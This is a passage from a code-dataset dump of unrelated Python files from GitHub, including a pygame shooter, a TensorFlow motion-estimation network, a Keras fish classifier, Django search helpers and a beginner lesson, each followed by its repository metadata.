self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.bottom = y\n self.speed = -15\n\n def update(self):\n self.rect.y += self.speed\n if self.rect.bottom < 0:\n self.kill()\n\nclass E_bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, z):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((18,18))\n self.image = pygame.transform.scale(E_Bullet_IMG, (18,18))\n self.image.set_colorkey(WHITE)\n self.rect = self.image.get_rect()\n self.radius = 9\n self.rect.centerx = x\n self.rect.centery = y\n self.speedx = 
random.randrange(-1, 2)\n self.speedy = z\n\n def update(self):\n if Enemy().EnemyFireMode == 1:\n self.move()\n if self.rect.top > HEIGHT or self.rect.right > P_WIDTH or self.rect.left < 0:\n self.kill()\n\n def move(self):\n self.rect.centerx += self.speedx\n self.rect.centery += self.speedy\n\nclass StartButtom(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = StartButtom_IMG\n self.rect = self.image.get_rect()\n self.rect.x = 500\n self.rect.y = 400\n\n def update(self, Mx, My):\n if 700 >= Mx >= 500 and 480 >= My >= 400:\n self.rect.x = 490\n self.rect.y = 380\n else:\n self.rect.x = 500\n self.rect.y = 400\n\nclass MusicButtom(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = MusicOn_IMG\n self.rect = self.image.get_rect()\n self.rect.x = 500\n self.rect.y = 500\n\n def update(self, Mx, My):\n if 700 >= Mx >= 500 and 580 >= My >= 500:\n self.rect.x = 490\n self.rect.y = 480\n else:\n self.rect.x = 500\n self.rect.y = 500\n if Music_On == True:\n self.image = MusicOn_IMG\n elif Music_On == False:\n self.image = MusicOFF_IMG\n\nclass RestartButtom(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = ReStartButtom_IMG\n self.rect = self.image.get_rect()\n self.rect.x = 400\n self.rect.y = 600\n\n def update(self, Mx, My):\n if 600 >= Mx >= 400 and 680 >= My >= 600:\n self.rect.x = 390\n self.rect.y = 580\n else:\n self.rect.x = 400\n self.rect.y = 600\n\n# sprite 群組\nall_sprite = pygame.sprite.Group()\nplayer_sprite = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\nenemy_sprite = pygame.sprite.Group()\nenemy_bullets = pygame.sprite.Group()\nbuttom_sprite = pygame.sprite.Group()\nED_sprite = pygame.sprite.Group()\n\nplayer = Player()\nall_sprite.add(player)\nplayer_sprite.add(player)\nenemy = Enemy()\nall_sprite.add(enemy)\nenemy_sprite.add(enemy)\n\nsb = StartButtom()\nbuttom_sprite.add(sb)\nmb = MusicButtom()\nbuttom_sprite.add(mb)\nrb = RestartButtom()\nED_sprite.add(rb)\n# 主迴圈\n\nwhile updating:\n time.tick(FPS)\n\n if GAMESTEP == 0:\n screen.blit(Title_IMG, (0, 0))\n if pygame.mixer.music.get_busy() == 0:\n if Music_On == True:\n Menu_Bgm.play()\n Menu_Bgm.set_volume(0.1)\n Mx, My = pygame.mouse.get_pos()\n buttom_sprite.update(Mx, My)\n if 700 >= Mx >= 500 and 480 >= My >= 400:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n Menu_Bgm.stop()\n GAMESTEP = 1\n if 700 >= Mx >= 500 and 580 >= My >= 500:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n if Music_On == True:\n Music_On = False\n Menu_Bgm.stop()\n else:\n Music_On = True\n buttom_sprite.draw(screen)\n elif GAMESTEP == 1: #主階段\n if pygame.mixer.music.get_busy() == 0:\n if Music_On == True:\n Game_Bgm.play()\n Game_Bgm.set_volume(0.1)\n screen.blit(frame_IMG, (0, 0))\n if player_heart == 3:\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (760, 255))\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (810, 255))\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (860, 255))\n elif player_heart == 2:\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (760, 255))\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (810, 255))\n elif player_heart == 1:\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (760, 255))\n elif player_heart == 0:\n Game_Bgm.stop()\n GAMESTEP = 2\n\n all_sprite.update()\n hit = pygame.sprite.groupcollide(enemy_sprite, bullets, False, 
True, pygame.sprite.collide_circle)\n if hit:\n E_Health -= 1\n Score += 10\n getfire = pygame.sprite.spritecollide(player, enemy_bullets, True, pygame.sprite.collide_circle)\n if getfire :\n player_heart -= 1\n \n if E_Health == 0:\n Game_Bgm.stop()\n GAMESTEP = 2\n all_sprite.draw(screen)\n score_text(screen, str(Score), 36, 840, 114)\n if Score > int(hscore):\n BS_text(screen, str(Score), 36, 900, 74)\n else:\n BS_text(screen, str(hscore), 36, 900, 74)\n\n\n elif GAMESTEP == 2: #勝利\n if Score > int(hscore):\n f.write(Score)\n f.close()\n screen.blit(GoodEnd_IMG,(0,0))\n win = True\n GAMESTEP = 3\n else:\n screen.blit(BadEnd_IMG,(0,0))\n win = False\n GAMESTEP = 3\n \n elif GAMESTEP == 3:\n if win == True:\n screen.blit(GoodEnd_IMG,(0,0))\n else:\n screen.blit(BadEnd_IMG,(0,0))\n Mx, My = pygame.mouse.get_pos()\n ED_sprite.update(Mx, My)\n if 600 >= Mx >= 400 and 680 >= My >= 600:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n GAMESTEP = 0\n ED_sprite.draw(screen)\n\n\n \n\n # 輸入\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n updating = False\n pygame.display.update()\n","repo_name":"DanDingTangYuan/Python-Game","sub_path":"projectFgame.py","file_name":"projectFgame.py","file_ext":"py","file_size_in_byte":15393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32498360718","text":"class Solution:\n \"\"\"Two pointers way\"\"\"\n def reverseString(self, s):\n l, r = 0, len(s) - 1\n\n while l <= r:\n s[l], s[r] = s[r], s[l]\n l += 1\n r -= 1\n\n print(str)\n\n # s[:] = s[::-1]\n\n\n\n\nstr = [\"H\",\"a\",\"n\",\"n\",\"a\",\"h\"]\n\nSolution().reverseString(str)","repo_name":"ForwardMoth/leetcode","sub_path":"300-399/344. Reverse String.py","file_name":"344. 
Reverse String.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"41264406248","text":"\"\"\"Module to represent Graph\"\"\"\n\n\nfrom LinkedList import LinkedList\n\n\nclass LinkedListGraph(LinkedList):\n \"\"\"A linked list class for a graph\"\"\"\n def __init__(self):\n super().__init__()\n\n def delete_edge_vertex(self, value):\n \"\"\"Method of removing all edges that contain\n a vertex with a specified value\"\"\"\n if self.is_empty():\n print(\"Список пуст\")\n else:\n current = self.head\n ind = 0\n\n while current is not None:\n if value in current.value:\n self.remove_node(ind)\n else:\n ind += 1\n current = current.next\n\n\nclass Graph:\n \"\"\"Class realized methods for Graph\"\"\"\n def __init__(self):\n self.vertex = LinkedListGraph()\n self.edges = LinkedListGraph()\n\n def __str__(self):\n current_vertex = self.vertex.head\n string = ''\n while current_vertex is not None:\n string += str(current_vertex.value)\n string += ' -> '\n current_vertex = current_vertex.next\n string += 'None\\n'\n\n current_edge = self.edges.head\n while current_edge is not None:\n string += str(current_edge.value)\n string += ' -> '\n current_edge = current_edge.next\n string += 'None'\n return string\n\n def edge_exists(self, vertex1, vertex2):\n \"\"\"Method for checking the existence of an edge\"\"\"\n return self.edges.is_value((vertex1, vertex2))\n\n def vertex_exists(self, value):\n \"\"\"Method for checking the existence of an vertex\"\"\"\n return self.vertex.is_value(value)\n\n def add_edge(self, vertex1, vertex2):\n \"\"\"Edge adding method\"\"\"\n if self.edges.is_empty() or not self.edge_exists(vertex1, vertex2):\n self.edges.add_last((vertex1, vertex2))\n else:\n raise ValueError(\"That edge is exists\")\n\n def add_vertex(self, value):\n \"\"\"Method for add vertex\"\"\"\n if self.vertex.is_empty() or not self.vertex_exists(value):\n self.vertex.add_last(value)\n else:\n raise ValueError(\"That vertex is exists\")\n\n def delete_vertex(self, value):\n \"\"\"Method for delete vertex\"\"\"\n if self.vertex_exists(value):\n self.edges.delete_edge_vertex(value)\n self.vertex.remove_node(value)\n else:\n raise ValueError(\"No such vertex exists\")\n\n def get_vertex(self, index):\n return self.vertex.search(index)\n\n def get_edge(self, index):\n return self.edges.search(index)\n\n\n\n\n","repo_name":"lazorikv/python-education","sub_path":"algorithms/data_structures/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31627107402","text":"import tensorflow.compat.v1 as tf\n\nfrom depth_and_motion_learning import maybe_summary\nfrom tensorflow.contrib import framework as contrib_framework\nfrom tensorflow.contrib import layers as contrib_layers\n\nlayers = contrib_layers\narg_scope = contrib_framework.arg_scope\n\n\ndef motion_vector_net(images, weight_reg, predict_intrinsics=True):\n \"\"\"Predict object-motion vectors from a stack of frames or embeddings.\n\n Args:\n images: Input tensor with shape [B, h, w, 2c], containing two\n depth-concatenated images.\n weight_reg: A float scalar, the amount of weight regularization.\n predict_intrinsics: A boolean, if True the network will predict the\n intrinsic matrix as well.\n\n Returns:\n A tuple of 3 tf.Tensors, (rotation, translation, intrinsic_mat), of shapes\n [B, 3], [B, 3] and [B, 3, 3] respectively, 
representing translation vectors,\n rotation angles, and predicted intrinsics matrix respectively. If\n predict_intrinsics is false, the latter is not returned.\n \"\"\"\n with tf.variable_scope('MotionVectorNet'):\n with arg_scope([layers.conv2d],\n weights_regularizer=layers.l2_regularizer(weight_reg),\n activation_fn=tf.nn.relu,\n stride=2):\n conv1 = layers.conv2d(images, 16, [7, 7], scope='Conv1')\n conv2 = layers.conv2d(conv1, 32, [5, 5], scope='Conv2')\n conv3 = layers.conv2d(conv2, 64, [3, 3], scope='Conv3')\n conv4 = layers.conv2d(conv3, 128, [3, 3], scope='Conv4')\n conv5 = layers.conv2d(conv4, 256, [3, 3], scope='Conv5')\n conv6 = layers.conv2d(conv5, 256, [3, 3], scope='Conv6')\n conv7 = layers.conv2d(conv6, 256, [3, 3], scope='Conv7')\n\n bottleneck = tf.reduce_mean(conv7, axis=[1, 2], keepdims=True)\n\n with arg_scope([layers.conv2d],\n biases_initializer=None,\n activation_fn=None,\n stride=1):\n rotation = layers.conv2d(bottleneck, 3, [1, 1], scope='Rotation')\n translation = layers.conv2d(bottleneck, 3, [1, 1], scope='Translation')\n rotation = tf.squeeze(rotation, axis=(1, 2))\n translation = tf.squeeze(translation, axis=(1, 2))\n image_height, image_width = tf.unstack(tf.shape(images)[1:3])\n rot_scale, trans_scale = create_scales(0.001)\n if predict_intrinsics:\n intrinsic_mat = add_intrinsics_head(bottleneck, image_height, image_width)\n return rotation * rot_scale, translation * trans_scale, intrinsic_mat\n # returning different number of items to unpack might cause issues.\n return rotation * rot_scale, translation * trans_scale, None\n\n\ndef add_intrinsics_head(bottleneck, image_height, image_width):\n \"\"\"Adds a head the preficts camera intrinsics.\n\n Args:\n bottleneck: A tf.Tensor of shape [B, 1, 1, C], typically the bottlenech\n features of a netrowk.\n image_height: A scalar tf.Tensor or an python scalar, the image height in\n pixels.\n image_width: A scalar tf.Tensor or an python scalar, the image width in\n pixels.\n\n image_height and image_width are used to provide the right scale for the focal\n length and the offest parameters.\n\n Returns:\n a tf.Tensor of shape [B, 3, 3], and type float32, where the 3x3 part is the\n intrinsic matrix: (fx, 0, x0), (0, fy, y0), (0, 0, 1).\n \"\"\"\n with tf.variable_scope('CameraIntrinsics'):\n # Since the focal lengths in pixels tend to be in the order of magnitude of\n # the image width and height, we multiply the network prediction by them.\n focal_lengths = tf.squeeze(\n layers.conv2d(\n bottleneck,\n 2, [1, 1],\n stride=1,\n activation_fn=tf.nn.softplus,\n weights_regularizer=None,\n scope='foci'),\n axis=(1, 2)) * tf.to_float(\n tf.convert_to_tensor([[image_width, image_height]]))\n\n # The pixel offsets tend to be around the center of the image, and they\n # are typically a fraction the image width and height in pixels. 
We thus\n # multiply the network prediction by the width and height, and the\n # additional 0.5 them by default at the center of the image.\n offsets = (tf.squeeze(\n layers.conv2d(\n bottleneck,\n 2, [1, 1],\n stride=1,\n activation_fn=None,\n weights_regularizer=None,\n biases_initializer=None,\n scope='offsets'),\n axis=(1, 2)) + 0.5) * tf.to_float(\n tf.convert_to_tensor([[image_width, image_height]]))\n\n foci = tf.linalg.diag(focal_lengths)\n\n maybe_summary.scalar('foci', tf.reduce_mean(foci))\n maybe_summary.scalar('offsets', tf.reduce_mean(offsets))\n\n intrinsic_mat = tf.concat([foci, tf.expand_dims(offsets, -1)], axis=2)\n batch_size = tf.shape(bottleneck)[0]\n last_row = tf.tile([[[0.0, 0.0, 1.0]]], [batch_size, 1, 1])\n intrinsic_mat = tf.concat([intrinsic_mat, last_row], axis=1)\n return intrinsic_mat\n\n\ndef motion_field_net(images,\n weight_reg=0.0,\n align_corners=True,\n auto_mask=False):\n \"\"\"Predict object-motion vectors from a stack of frames or embeddings.\n\n Args:\n images: Input tensor with shape [B, h, w, 2c], containing two\n depth-concatenated images.\n weight_reg: A float scalar, the amount of weight regularization.\n align_corners: align_corners in resize_bilinear. Only used in version 2.\n auto_mask: True to automatically masking out the residual translations\n by thresholding on their mean values.\n\n Returns:\n A tuple of 3 tf.Tensors:\n rotation: [B, 3], global rotation angles.\n background_translation: [B, 1, 1, 3], global translation vectors.\n residual_translation: [B, h, w, 3], residual translation vector field. The\n overall translation field is background_translation+residual_translation.\n \"\"\"\n\n with tf.variable_scope('MotionFieldNet'):\n with arg_scope([layers.conv2d],\n weights_regularizer=layers.l2_regularizer(weight_reg),\n activation_fn=tf.nn.relu):\n\n conv1 = layers.conv2d(images, 16, [3, 3], stride=2, scope='Conv1')\n conv2 = layers.conv2d(conv1, 32, [3, 3], stride=2, scope='Conv2')\n conv3 = layers.conv2d(conv2, 64, [3, 3], stride=2, scope='Conv3')\n conv4 = layers.conv2d(conv3, 128, [3, 3], stride=2, scope='Conv4')\n conv5 = layers.conv2d(conv4, 256, [3, 3], stride=2, scope='Conv5')\n conv6 = layers.conv2d(conv5, 512, [3, 3], stride=2, scope='Conv6')\n conv7 = layers.conv2d(conv6, 1024, [3, 3], stride=2, scope='Conv7')\n\n bottleneck = tf.reduce_mean(conv7, axis=[1, 2], keepdims=True)\n\n background_motion = layers.conv2d(\n bottleneck,\n 6, [1, 1],\n stride=1,\n activation_fn=None,\n biases_initializer=None,\n scope='background_motion')\n\n rotation = background_motion[:, 0, 0, :3]\n background_translation = background_motion[:, :, :, 3:]\n\n residual_translation = layers.conv2d(\n background_motion,\n 3, [1, 1],\n stride=1,\n activation_fn=None,\n scope='unrefined_residual_translation')\n residual_translation = _refine_motion_field(\n residual_translation, conv7, align_corners, scope='Refine7')\n residual_translation = _refine_motion_field(\n residual_translation, conv6, align_corners, scope='Refine6')\n residual_translation = _refine_motion_field(\n residual_translation, conv5, align_corners, scope='Refine5')\n residual_translation = _refine_motion_field(\n residual_translation, conv4, align_corners, scope='Refine4')\n residual_translation = _refine_motion_field(\n residual_translation, conv3, align_corners, scope='Refine3')\n residual_translation = _refine_motion_field(\n residual_translation, conv2, align_corners, scope='Refine2')\n residual_translation = _refine_motion_field(\n residual_translation, conv1, align_corners, 
scope='Refine1')\n residual_translation = _refine_motion_field(\n residual_translation, images, align_corners, scope='RefineImages')\n\n rot_scale, trans_scale = create_scales(0.001)\n background_translation *= trans_scale\n residual_translation *= trans_scale\n rotation *= rot_scale\n\n if auto_mask:\n sq_residual_translation = tf.sqrt(\n tf.reduce_sum(residual_translation**2, axis=3, keepdims=True))\n mean_sq_residual_translation = tf.reduce_mean(\n sq_residual_translation, axis=[0, 1, 2])\n # A mask of shape [B, h, w, 1]\n mask_residual_translation = tf.cast(\n sq_residual_translation > mean_sq_residual_translation,\n residual_translation.dtype.base_dtype)\n residual_translation *= mask_residual_translation\n\n image_height, image_width = tf.unstack(tf.shape(images)[1:3])\n intrinsic_mat = add_intrinsics_head(bottleneck, image_height, image_width)\n\n return (rotation, background_translation, residual_translation,\n intrinsic_mat)\n\n\ndef create_scales(constraint_minimum):\n \"\"\"Creates variables representing rotation and translation scaling factors.\n\n Args:\n constraint_minimum: A scalar, the variables will be constrained to not fall\n below it.\n\n Returns:\n Two scalar variables, rotation and translation scale.\n \"\"\"\n\n def constraint(x):\n return tf.nn.relu(x - constraint_minimum) + constraint_minimum\n\n with tf.variable_scope('Scales', initializer=0.01, constraint=constraint):\n rot_scale = tf.get_variable('rotation')\n trans_scale = tf.get_variable('translation')\n maybe_summary.scalar('rotation', rot_scale)\n maybe_summary.scalar('translation', trans_scale)\n\n return rot_scale, trans_scale\n\n\ndef _refine_motion_field(motion_field, layer, align_corners, scope=None):\n \"\"\"Refines a motion field using features from another layer.\n\n This function builds an element of a UNet-like architecture. `motion_field`\n has a lower spatial resolution than `layer`. First motion_field is resized to\n `layer`'s spatial resolution using bilinear interpolation, then convolutional\n filters are applied on `layer` and the result is added to the upscaled\n `motion_field`.\n\n This scheme is inspired by FlowNet (https://arxiv.org/abs/1504.06852), and the\n realization that keeping the bottenecks at the same (low) dimension as the\n motion field will pressure the network to gradually transfer details from\n depth channels to space.\n\n The specifics are slightly different form FlowNet: We use two parallel towers,\n a 3x3 convolution, and two successive 3x3 convolutions, as opposed to one\n 3x3 convolution in FLowNet. Also, we add the result to the upscaled\n `motion_field`, forming a residual connection, unlike FlowNet. These changes\n seemed to improve the depth prediction metrics, but exploration was far from\n exhaustive.\n\n Args:\n motion_field: a tf.Tensor of shape [B, h1, w1, m]. 
m is the number of\n dimensions in the motion field, for example, 3 in case of a 3D translation\n field.\n layer: tf.Tensor of shape [B, h2, w2, c].\n align_corners: align_corners in resize_bilinear.\n scope: the variable scope.\n\n Returns:\n A tf.Tensor of shape [B, h2, w2, m], obtained by upscaling motion_field to\n h2, w2, and mixing it with layer using a few convolutions.\n\n \"\"\"\n with tf.variable_scope(scope):\n _, h, w, _ = tf.unstack(tf.shape(layer))\n # Only align_corners=True is supported on TPU\n upsampled_motion_field = tf.image.resize_bilinear(\n motion_field, [h, w], align_corners=align_corners)\n conv_input = tf.concat([upsampled_motion_field, layer], axis=3)\n # pyformat: disable\n conv_output = layers.conv2d(\n conv_input, max(4, layer.shape.as_list()[-1]), [3, 3], stride=1)\n conv_input = layers.conv2d(\n conv_input, max(4, layer.shape.as_list()[-1]), [3, 3], stride=1)\n conv_output2 = layers.conv2d(\n conv_input, max(4, layer.shape.as_list()[-1]), [3, 3], stride=1)\n # pyformat: enable\n conv_output = tf.concat([conv_output, conv_output2], axis=-1)\n\n return upsampled_motion_field + layers.conv2d(\n conv_output,\n motion_field.shape.as_list()[-1], [1, 1],\n stride=1,\n activation_fn=None,\n biases_initializer=None)\n","repo_name":"google-research/google-research","sub_path":"depth_and_motion_learning/object_motion_nets.py","file_name":"object_motion_nets.py","file_ext":"py","file_size_in_byte":12241,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"1753796579","text":"from abc import ABC, abstractmethod\nfrom hashlib import sha256\nimport os\nfrom pathlib import Path\nimport random\nfrom time import sleep, time\nfrom uuid import uuid4\nfrom morecontext import envset\nfrom fscacher import PersistentCache\n\n\nclass BaseCacheBenchmark(ABC):\n param_names = [\"mode\"]\n params = [[\"populate\", \"hit\", \"ignore\"]]\n\n @abstractmethod\n def init_path(self, *args):\n # Must return the path created\n ...\n\n @staticmethod\n @abstractmethod\n def init_func(cache):\n # Must return the function\n ...\n\n def init_cache(self, ignore: bool = False):\n with envset(\"FSCACHER_CACHE\", \"ignore\" if ignore else \"\"):\n self.cache = PersistentCache(path=str(uuid4()))\n self.func = self.init_func(self.cache)\n\n def setup(self, mode, *args):\n self.path = self.init_path(mode, *args)\n if mode == \"hit\":\n self.init_cache()\n self.func(self.path)\n elif mode == \"ignore\":\n self.init_cache(ignore=True)\n\n def time_cache(self, mode, *_args):\n if mode == \"populate\":\n self.init_cache()\n self.func(self.path)\n\n\nclass TimeFile(BaseCacheBenchmark):\n FILE_SIZE = 1024\n\n def init_path(self, *_args):\n with open(\"foo.dat\", \"wb\") as fp:\n fp.write(bytes(random.choices(range(256), k=self.FILE_SIZE)))\n return \"foo.dat\"\n\n @staticmethod\n def init_func(cache):\n @cache.memoize_path\n def hashfile(path):\n # \"emulate\" slow invocation so significant raise in benchmark\n # consumed time would mean that we invoked it instead\n # of using cached value\n sleep(0.01)\n with open(path, \"rb\") as fp:\n return sha256(fp.read()).hexdigest()\n\n return hashfile\n\n\nclass BaseDirectoryBenchmark(BaseCacheBenchmark):\n param_names = BaseCacheBenchmark.param_names + [\"tmpdir\"]\n params = BaseCacheBenchmark.params + [\n os.environ.get(\"FSCACHER_BENCH_TMPDIRS\", \".\").split(\":\")\n ]\n\n @staticmethod\n @abstractmethod\n def get_layout():\n ...\n\n def init_path(self, _mode, tmpdir):\n dirpath = Path(tmpdir, 
str(uuid4()))\n dirpath.mkdir(parents=True)\n base_time = time()\n dirs = [dirpath]\n layout = self.get_layout()\n for i, width in enumerate(layout):\n if i < len(layout) - 1:\n dirs2 = []\n for d in dirs:\n for x in range(width):\n d2 = d / f\"d{x}\"\n d2.mkdir()\n dirs2.append(d2)\n dirs = dirs2\n else:\n for j, d in enumerate(dirs):\n for x in range(width):\n f = d / f\"f{x}.dat\"\n f.write_bytes(b\"\\0\" * random.randint(1, 1024))\n t = base_time - x - j * width\n os.utime(f, (t, t))\n return dirpath\n\n @staticmethod\n def init_func(cache):\n @cache.memoize_path\n def dirsize(path):\n total_size = 0\n with os.scandir(path) as entries:\n for e in entries:\n if e.is_dir():\n total_size += dirsize(e.path)\n else:\n total_size += e.stat().st_size\n return total_size\n\n return dirsize\n\n\nclass TimeFlatDirectory(BaseDirectoryBenchmark):\n @staticmethod\n def get_layout():\n return (100,)\n\n\nclass TimeDeepDirectory(BaseDirectoryBenchmark):\n @staticmethod\n def get_layout():\n return (3, 3, 3, 3)\n","repo_name":"con/fscacher","sub_path":"benchmarks/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6252097996","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping\nfrom keras.preprocessing.image import load_img, img_to_array\n\n\n# In[2]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# In[3]:\n\n\nepochs = 30\n\n\n# In[4]:\n\n\n# データをつくる\ntrain_datagen = ImageDataGenerator(rescale=1.0/255, rotation_range=90, width_shift_range=0.2, height_shift_range=0.2,\n horizontal_flip=True)\ntest_datagen = ImageDataGenerator(rescale=1.0/255)\n\n\n# In[5]:\n\n\ntrain_generator = train_datagen.flow_from_directory('../data/butterflyfish/train', target_size=(200,200),\n batch_size=32, class_mode='binary')\n\n\n# In[6]:\n\n\nvalidation_generator = test_datagen.flow_from_directory('../data/butterflyfish/validation', target_size=(200,200),\n batch_size=32, class_mode='binary')\n\n\n# In[7]:\n\n\n# モデルをつくる\nmodel = Sequential()\nmodel.add(Convolution2D(32, (3, 3), activation='relu', input_shape=(200, 200, 3)))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Convolution2D(32, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\nmodel.add(Convolution2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1, activation='sigmoid'))\n\n\n# In[8]:\n\n\nprint(train_generator.class_indices)\n\n\n# In[9]:\n\n\nmodel.summary()\n\n\n# In[10]:\n\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\n# In[11]:\n\n\nhistory = model.fit_generator(train_generator, epochs=epochs, verbose=1, validation_data=validation_generator)\n\n\n# In[12]:\n\n\nplt.plot(range(1, epochs+1), history.history['acc'], label=\"training\")\nplt.plot(range(1, epochs+1), history.history['val_acc'], label=\"validation\")\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\nplt.show()\n\n\n# In[15]:\n\n\nimg = load_img(\"../data/originaldata/test.jpg\", target_size=(200, 200))\nplt.imshow(img)\n\n\n# In[16]:\n\n\narray = img_to_array(img)\narray /= 
255\nx = np.expand_dims(array, axis=0)\npred = model.predict(x)\nprint(pred[0])\nif pred[0] >= 0.5:\n print('トゲチョウチョウウオです')\nelse:\n print('チョウチョウウオです')\n\n\n# In[17]:\n\n\nimg = load_img(\"../data/originaldata/test2.jpg\", target_size=(200, 200))\nplt.imshow(img)\n\n\n# In[18]:\n\n\narray = img_to_array(img)\narray /= 255\nx = np.expand_dims(array, axis=0)\npred = model.predict(x)\nprint(pred[0])\nif pred[0] >= 0.5:\n print('トゲチョウチョウウオです')\nelse:\n print('チョウチョウウオです')\n\n\n# In[19]:\n\n\nimg = load_img(\"../data/originaldata/test3.jpg\", target_size=(200, 200))\nplt.imshow(img)\n\n\n# In[20]:\n\n\narray = img_to_array(img)\narray /= 255\nx = np.expand_dims(array, axis=0)\npred = model.predict(x)\nprint(pred[0])\nif pred[0] >= 0.5:\n print('トゲチョウチョウウオです')\nelse:\n print('チョウチョウウオです')\n\n","repo_name":"mizukiono/cnn_tutorial","sub_path":"butterflyfish/bfish_simplecnn.py","file_name":"bfish_simplecnn.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74050680006","text":"import datetime\nimport calendar\nfrom django.db.models import Q\nfrom booking_api.models import Equipment, Experiment,Lab, Professor\n\n\ndef dateToDay(date):\n format_date=datetime.datetime.strptime(date, \"%d%m%Y\").date()\n day=calendar.day_name[format_date.weekday()]\n return day.upper()[:2]\n\n\ndef get_lab_text_search(text):\n labs=Lab.objects.filter(Q(name__icontains=text) | Q(description__icontains=text)) \n return labs\n\ndef get_experiment_text_search(text):\n experiments=Experiment.objects.filter(Q(name__icontains=text.lower()) | Q(description__icontains=text.lower()))\n labs=[]\n print(Lab.get_all_labs())\n for lab in Lab.get_all_labs():\n print(\"a\")\n lab_exp=lab.experiments.all()\n print(lab_exp)\n if lab_exp.intersection(experiments).count()>0:\n print(lab)\n labs.append(lab.id)\n labs_set=Lab.objects.filter(id__in=labs)\n return labs_set\n\ndef get_equipment_text_search(text):\n equipments=Equipment.objects.filter(Q(name__icontains=text.lower()) | Q(description__icontains=text.lower()))\n labs=[]\n for lab in Lab.get_all_labs():\n lab_eq=lab.equipments.all()\n if lab_eq.intersection(equipments).count()>0:\n labs.append(lab.id)\n labs_set=Lab.objects.filter(id__in=labs)\n return labs_set\n\ndef get_research_text_search(text):\n professors=Professor.objects.filter(Q(research_field__icontains=text) | Q(research_description__icontains=text)) \n return professors\n","repo_name":"kunalbhatia-868/EasyBookLabsBackend","sub_path":"booking_api/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23345810574","text":"\n# COMMENT\n# This is a comment\n# print(\"aaa\")\n\npi = 3.14\nradius = 2.2\n\n# Aku lagi ingin menghitung luas lingkaran\n\n## INI RUMUS LINGKARAN LOH!!!\narea = pi * (radius ** 2)\nprint(area)\n# INI AREA LOHHHHH!!!\n\n# MEMORI\n\n# VARIABLE\n# integer -> int -> 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 [4 bytes]\n# string\n\narchel = 10 # MEMORI 4 BYTES\n\nprint(2**128)\n\n# int = min sama max vals. -> MIN -3.000.000 MAX 3.000.000 | -> 3.000.001 -> -2.999.999\n# nyewa space ada di RAM. 
-> 4 bytes -> 32 bits -> 2^32 -> \n\n# ---------\n\narchel_nganu = 9\narchel_ngeselin = False\nbatas_remed = 8.5\n\n# KLO ARCHEL KURANG DARI BATAS REMED, DIA REMED + DIA NGESELIN DIMARAAHIN ORANG TUA\n# KLO NGGAK NGESELIN, DIA TAPI SCORENYA DIATAS REMED DIKASIH UANG 100000\n# KLO NGGAK NGESELIN, DIA REMED, DIMARAHIN GURU\n\nif archel_nganu < batas_remed:\n if archel_ngeselin:\n print(\"ARCHEL DIMARAHIN ORANG TUA\")\n print(\"ARCHEL DIMARAHIN GURU\")\nelse:\n if archel_ngeselin:\n print(\"ARCHEL DIMARAHIN ORANG TUA + DAPET UANG 5000\")\n else:\n print(\"ARCHEL DAPET UANG 100000\")\n\n","repo_name":"KingOfChuunibyou/Hahahihi","sub_path":"lesson1/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"44181829651","text":"from django.forms import Field, HiddenInput, EmailInput, ValidationError\nfrom django.core.validators import EmailValidator\nfrom django.db.models import Model\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth.models import User\n\n\nclass UserField(Field):\n widget = EmailInput\n label = _(\"User e-mail\")\n validators = 